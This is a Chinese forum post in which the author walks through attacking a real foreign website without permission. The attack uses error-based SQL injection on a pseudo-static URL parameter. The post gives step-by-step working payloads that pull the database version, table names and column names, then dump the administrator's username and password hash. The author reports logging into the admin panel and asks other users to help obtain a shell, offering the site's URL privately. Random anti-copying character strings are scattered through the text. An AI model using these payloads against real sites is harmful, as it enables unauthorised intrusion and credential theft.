中国网络渗透测试联盟

标题: 对国外站的伪静态注入 [打印本页]

作者: admin    时间: 2012-12-20 09:00
标题: 对国外站的伪静态注入
近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。
! R( Z7 I& }* Z5 F% h9 |- Q

首先找到网站后台,加了个admin,后台出来了


; X9 b# c' N9 I" r& L0 P/ t
( B, m3 t& X) ?2 W
' r+ E1 W0 ~7 I1 w. u( P

然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入% Q0 u: u  Q2 Y+ ~* u3 o
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg

从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。

首先查下数据库相关信息。

www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—
% d3 E* v: R" Q4 h8 s6 |5 K: r! Z2 _

: j: N1 @$ \: Z$ G3 p( l
9 A, V) x1 U) ?6 j) w% @4 D9 S  a5 q, U/ V- f
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg
7 B- ~8 A) c* ~1 H, O' d. V
4 j% m: `9 H# d
2 B3 g6 R' k/ p! Z8 ~
4 P, q: E2 ?- R* |) O! V$ ]$ Z% j  Z! D$ c
可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。

然后我们查表

http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))--

得到管理员表段frame_administrator% b9 D* H1 G" E+ m/ W

2 X* Z+ I  M' k! e# K- \  L$ m3 {8 Q
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg
6 F1 W; i1 d' _6 @: [, D* B. X9 q5 d  W

9 P- i. q# K! t. H5 X+ q" i

查字段

http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--/ K& H4 y; G& N  g

, T+ H- S. }3 _% ?( ^
& W2 S7 q0 Q# B  V0 Y6 ~& ?' B$ Q  ^6 J1 ?% d

得到userID,userPass字段

最后

http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--
( k3 O/ p# A$ G, W9 d; s) T  ]1 c8 X5 j6 v# @2 p/ u/ H, _

# g5 }; n; j; N9 q
' m6 O0 x0 {: h, t" x) z9 @0 A

得到最终结果admin eb0a191797624dd3a48fa681d3061212

解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2